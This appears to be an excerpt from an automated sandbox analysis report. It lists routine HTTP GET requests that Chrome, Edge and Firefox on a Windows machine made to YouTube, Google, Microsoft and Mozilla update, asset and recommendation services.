Source: global traffic HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2 HTTP/1.1Host: fonts.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"Origin: https://accounts.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1722622217&P2=404&P3=2&P4=HRMAGmFP8EnBZRt3MBzrWkGoEL886HyLUTisCaE9WLiFCc98%2b6UZVpkmckHSlQ4wxX7sFV9VZU%2fvGxngRqL8XA%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: CsGSn4HudrHHhUu1O19xTfSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /v4/api/selection?placement=88000360&nct=1&fmt=json&ADEFAB=1&OPSYS=WIN10&locale=en-GB&country=CH&edgeid=6686581979505309747&ACHANNEL=4&ABUILD=117.0.5938.132&poptin=0&devosver=10.0.19045.2006&clr=esdk&UITHEME=light&EPCON=0&AMAJOR=117&AMINOR=0&ABLD=5938&APATCH=132 HTTP/1.1Host: arc.msn.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-812259498&timestamp=1722017421427 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/domains_config_gz/2.8.75/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ProductCategoriesSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=516=R6AXCkxUWuMyNXOsPODa58uOz3LBr7nLToGxfNvZ-cTlF0LvjEvbcKbAeCBEZ8QkXibOrtvgVPvtONOSimFG9HyXTv-XoLELcdl8mDhS8ofmMDtz0lqoA0RDhfNvbpCE3cKWL6xjAgdQjyKK5qU_93K62ar43IvGBMafQZLj4ok
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=953913297&timestamp=1722017443046 HTTP/1.1Host: accounts.youtube.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: https://accounts.google.com/Connection: keep-aliveUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: iframeSec-Fetch-Mode: navigateSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: https://accounts.google.com/Connection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: no-corsSec-Fetch-Site: same-site
Source: global traffic HTTP traffic detected: GET /v1/tiles HTTP/1.1Host: contile.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/ISET%3ASSE4_2%2CMEM%3A8191/default/default/update.xml HTTP/1.1Host: aus5.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /chains/remote-settings.content-signature.mozilla.org-2023-10-29-15-54-12.chain HTTP/1.1Host: content-signature-2.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveIf-Modified-Since: Sat, 09 Sep 2023 15:54:13 GMTIf-None-Match: "defaf397a2137227b32599694fdb5208"
Source: global traffic HTTP traffic detected: GET /v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb HTTP/1.1Host: location.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/monitor/collections/changes/changeset?_expected=0 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=US&count=30 HTTP/1.1Host: getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /desktop/v1/recommendations?locale=en-US&region=US&count=30 HTTP/1.1Host: firefox-api-proxy.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brconsumer_key: 94110-6d5ff7a89d72c869766af0e0Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/main/collections/search-telemetry-v2/changeset?_expected=1718041017650&_since=%221694014137037%22 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-aliveIf-Modified-Since: Fri, 25 Mar 2022 17:45:46 GMTIf-None-Match: "1648230346554"
Source: global traffic HTTP traffic detected: GET /update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/ISET%3ASSE4_2%2CMEM%3A8191/default/default/update.xml?force=1 HTTP/1.1Host: aus5.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /chains/remote-settings.content-signature.mozilla.org-2024-08-29-13-50-59.chain HTTP/1.1Host: content-signature-2.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/monitor/collections/changes/changeset?collection=quicksuggest&bucket=main&_expected=0 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /api/v4/addons/search/?guid=default-theme%40mozilla.org%2Caddons-search-detection%40mozilla.com%2Cgoogle%40search.mozilla.org%2Camazondotcom%40search.mozilla.org%2Cwikipedia%40search.mozilla.org%2Cbing%40search.mozilla.org%2Cddg%40search.mozilla.org%2Cfirefox-compact-light%40mozilla.org%2Cfirefox-compact-dark%40mozilla.org%2Cfirefox-alpenglow%40mozilla.org%2Cebay%40search.mozilla.org&lang=en-US HTTP/1.1Host: services.addons.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/main/collections/url-classifier-skip-urls/changeset?_expected=1720004688246&_since=%221606870304609%22 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/main/collections/quicksuggest/changeset?_expected=1721842166733 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fimgix.bustle.com%2Fuploads%2Fimage%2F2024%2F7%2F24%2Fd57cdb8b%2Fquitcooking_social.jpg%3Fw%3D1200%26h%3D630%26fit%3Dcrop%26crop%3Dfaces%26fm%3Djpg HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2Ff85f50edcf894021a38860edd7f5438c.jpg HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fmedia.wired.com%2Fphotos%2F669ee1db82dcc6be43bb872a%2F191%3A100%2Fw_1280%2Cc_limit%2FAMOC_Laerke_011.jpg HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2F8c6ba27004c947fdb8667ce4914d41c8.png HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /CAP5k4gWqcBGwir7bEEmBWveLMtvldFu-y_kyO3txFA=.9991.jpg HTTP/1.1Host: tiles-cdn.prod.ads.prod.webservices.mozgcp.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: no-corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fd1n0c1ufntxbvh.cloudfront.net%2Fphoto%2Feabcdc61%2F98254%2F1200x%2F HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /m6BvG6Rcntmafem2bLfA5IktKm1SEwqO2E4XIjaC12c=.10862.jpg HTTP/1.1Host: tiles-cdn.prod.ads.prod.webservices.mozgcp.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: no-corsSec-Fetch-Site: cross-site
